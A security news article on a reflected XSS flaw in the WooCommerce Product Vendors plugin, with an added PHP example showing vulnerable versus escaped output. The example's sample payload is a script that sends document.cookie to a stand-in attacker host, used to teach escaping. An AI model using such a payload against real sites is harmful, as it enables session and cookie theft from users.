Reflected XSS Vulnerability in WordPress WooCommerce Patched


Security vendor SiteLock today revealed that it found a vulnerability in a WooCommerce WordPress plugin, which has now been patched.

"The vulnerability was found in the Product Vendors extension to the WooCommerce plugin for WordPress, which is developed by WooCommerce themselves," Logan Kipp, WordPress Evangelist at SiteLock, told eSecurityPlanet.

WooCommerce is a widely deployed ecommerce plugin platform for WordPress. Back in May 2015, Automattic, the lead commercial sponsor behind the open-source WordPress content management system, acquired WooCommerce and has been evolving the platform ever since.

The vulnerability that SiteLock found is what is known as a Reflected Cross Site Scripting (XSS) flaw. In a reflected XSS, attacker-controlled input sent in a request (for example a URL or form parameter) is written straight back into the page the server returns. If that input is not escaped for the HTML context it lands in, a victim who is lured into submitting the crafted request ends up running the attacker's script in their own browser, within the site's origin. The root cause is typically a lack of proper input validation and output escaping.

Ramuel Gall, senior security analyst at SiteLock, reported the XSS issue to Automattic via the company's bug bounty program, which is operated by HackerOne.

"Version 2.0.27 of the WooCommerce Product Vendors plugin doesn't appear to correctly escape the 'vendor description' POST parameter and can be manipulated to reflect arbitrary scripting," Gall wrote in his submission to Automattic on July 25.
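The pattern Gall describes, a POST parameter reflected into the response without escaping, is illustrated below with an added example. This is not WooCommerce's or SiteLock's code and does not reproduce the plugin: the field name `vendor_description`, the HTML form it is echoed into, and the sample payload are all assumptions constructed for the illustration. It shows the vulnerable reflection beside the hardened version, plus a small check that flags whether the rendered output still contains live markup.

```php
<?php
// Added example (not the plugin's code). Demonstrates a reflected XSS sink
// in a form handler and the fix: escape on output for the HTML context.

// Constructed sample POST body. The closing quote and angle bracket break
// out of the value="" attribute the field is echoed into.
$sample_post = [
    'vendor_description' => '"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
];

// Vulnerable pattern: the raw parameter is concatenated into the page.
function render_vulnerable(array $post): string
{
    $desc = $post['vendor_description'] ?? '';
    return '<input type="text" name="vendor_description" value="' . $desc . '">';
}

// Hardened pattern: encode the value for an HTML attribute before emitting it.
// Inside WordPress the idiomatic calls are esc_attr() for attributes and
// esc_html() for element content; htmlspecialchars() is used here so the
// snippet runs outside WordPress.
function render_hardened(array $post): string
{
    $desc = $post['vendor_description'] ?? '';
    $safe = htmlspecialchars($desc, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="vendor_description" value="' . $safe . '">';
}

// Crude reflection check of the kind a scanner applies to a response: after the
// opening <input ...> tag, no further tag may appear. Returns true if the
// payload survived as markup (i.e. the page is vulnerable).
function reflects_markup(string $html): bool
{
    $after_tag = substr($html, strpos($html, '<input') + 6);
    return preg_match('/<\s*\/?\s*[a-z]/i', $after_tag) === 1;
}

$vuln = render_vulnerable($sample_post);
$safe = render_hardened($sample_post);

echo "vulnerable: ", $vuln, PHP_EOL;
echo "  reflects markup? ", var_export(reflects_markup($vuln), true), PHP_EOL;
echo "hardened:   ", $safe, PHP_EOL;
echo "  reflects markup? ", var_export(reflects_markup($safe), true), PHP_EOL;
```

The hardened form encodes `"`, `<` and `>` as `&quot;`, `&lt;` and `&gt;`, so the browser treats the whole payload as attribute text. Note that the escaping function has to match the context: a value placed inside a `<script>` block or a URL needs different encoding, which is why WordPress ships separate `esc_attr()`, `esc_html()`, `esc_js()` and `esc_url()` helpers.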

Kipp noted that the vulnerability was discovered during a routine scan of a customer's website by SiteLock's automated XSS scanner, which is included in various tiers of SiteLock's services.

"We scan millions of customers' websites daily for malware or vulnerabilities, which includes an extremely broad variety of applications," Kipp said. "Which applications are scanned will depend on which applications are present on customers' websites."

Automattic gave the issue only a "Low 2" severity score, though Kipp noted that the impact should not be understated. He explained that the risk level is rated Low 2 because, by itself, a reflected XSS vulnerability does not explicitly grant access to any sensitive data; vulnerabilities like these are more commonly used as one step in a larger attack.

"The impact of an attack through exploitation of this vector is chiefly limited by the imagination of the adversary," Kipp said. "Through a combination of exploiting this vulnerability and some light social engineering, the impact could become quite substantial."

"It would be a mistake to discount the risk involved with this vulnerability," he added.

Sean Michael Kerner is a senior editor at eSecurityPlanet. Follow him on Twitter @TechJournalist.